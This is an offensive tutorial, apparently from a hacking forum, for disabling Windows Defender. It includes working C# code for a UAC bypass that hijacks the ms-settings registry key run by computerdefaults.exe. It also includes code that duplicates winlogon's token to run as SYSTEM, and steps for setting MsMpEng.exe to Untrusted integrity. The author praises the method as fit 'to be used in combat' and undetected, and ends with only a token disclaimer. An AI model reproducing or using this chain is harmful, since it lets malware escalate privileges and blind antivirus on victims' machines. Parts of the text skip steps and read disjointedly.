Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)
Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)
Let's start, as expected, with a tedious theory. Unfortunately, without it, the essence of what is happening in the future will not be clear, so I will try to tell you as briefly as possible and in an understandable language.
Privilege tokens are permissions given by the system to a process. For example, if a process has a "SeShutdownPrivilege" token, then it has the right to turn off your computer. If your program does not have this token, it will not be able to perform this action.
Windows Defender uses its privileges to check files. For example, “SeRestorePlivilege". From this, we conclude that if you deprive the antivirus process of permission to check files, it will become useless and will not be able to perform this very check. Any explanation will become clearer if you translate it from dry text into visualization. Actually, for this reason, I suggest you download Process Hacker and look with your own eyes at the tokens available to a particular process.
Windows Defender is responsible for the process MsMpEng.exe we need to find it in the list and open the Tokens tab Here we notice that the process has many different privileges that are of key importance to it.
As you understand, we will deal with disabling these privileges. This concludes the theoretical part, and we begin to implement the POC.
At the very start, we are already plagued by two problems.
Well, let's start creating it.
Its essence is that the system application computerdefaults.exe , at startup, accesses regedit , in the path "Software\Classes\ms-settings\shell\open\command". Our task is to edit this item on your application. Now at startup computerdefaults.exe our application opens, but with administrator rights. Edit the registry and add the application launch via cmd.
string execPath = Assembly.GetEntryAssembly().Location;
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command");
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("", execPath, RegistryValueKind.String);
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
Registry.CurrentUser.Close();
Process process = new System.Diagnostics.Process();
ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = @"/C computerdefaults.exe";
process.StartInfo = startInfo;
process.Start();
Actually, at this stage we have already started our process on behalf of the administrator, without any warnings or icons on the icon.
As already mentioned, the Windows Defender process is running on behalf of NT AUTHORITY\SYSTEM.
We, being a normal process, cannot edit a process running on behalf of the system. We need a raise!
We will crank it through a duplicate token winlogon.exe Pay attention to the picture, here is the full algorithm of action.
If you explain what happened in a nutshell: Windows has a process like winlogon, it runs with the system and is responsible for user authorization. We will duplicate the token of this process and run our own program with the stolen token.
string procTostart = Assembly.GetEntryAssembly().Location;
Process process = Process.GetProcessesByName("winlogon")[0];
IntPtr procHandle = process.Handle;
IntPtr tokenHandle = IntPtr.Zero;
WinApi.OpenProcessToken(procHandle, 0x0002, out tokenHandle);
WinApi.STARTUPINFO SINFO = new WinApi.STARTUPINFO();
SINFO.dwFlags = 1;
SINFO.wShowWindow = 1;
WinApi.PROCESS_INFORMATION PINFO;
WinApi.SECURITY_ATTRIBUTES SECA = new WinApi.SECURITY_ATTRIBUTES();
IntPtr doubleDuplicateToken = IntPtr.Zero;
WinApi.DuplicateTokenEx(tokenHandle, 0x2000000, ref SECA, 2, WinApi.TOKEN_TYPE.TokenPrimary, out doubleDuplicateToken);
WinApi.CreateProcessWithTokenW(doubleDuplicateToken, WinApi.LogonFlags.NetCredentialsOnly, null, procTostart, WinApi.CreationFlags.DefaultErrorMode, IntPtr.Zero, null, ref SINFO, out PINFO);
We forced our program to run on behalf of SYSTEM, bypassing UAC at the same time.
Let's see what happened in the real test.
Actually, as you can see in the demonstration, the initial process is started without administrator rights.
At this point, we have fulfilled all the conditions for editing the privileges of the system process and are ready to implement disabling Windows Defender.
Let's go back to the theoretical chapter of the article for a second and remember why we actually made all these upgrades. Our task is to deprive the antivirus process of privileges, thanks to which it can check files for malware. There are two ways to solve this problem: Remove the entire list of privileges manually. Or set the Integrity Level to “Untrusted”.
During the tests, it was found that both of these solutions are interchangeable and will lead to the same result. Therefore” we will take the path of less resistance and set the Integrity Level “Untrusted".
Actually, the algorithm of actions is as follows :
The SID value of ”ML_UNTRUSTED" can be found in the Microsoft documentation, at the link.
Actually, this is the end of all the actions that we needed to do to remove privileges from the process.
The version of Windows Defender used is the most current at the time of writing.
So, let's ask ourselves the rhetorical question “What the fuck did I do that for?"
The disadvantages of this idea:
After carefully rereading the entire list of pros and cons, I come to the conclusion that this method has every chance of being used in combat.
Its main advantage is that the method is not burned by the Defender itself and will not be demolished when it hits the system.
In Silent.exe UAC bypass is not used, so you need to run it as an administrator.
This article is for informational purposes only. We do not encourage you to commit any hacking. Everything you do is your responsibility.
TOX : 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72 Telegram : @DevSecAS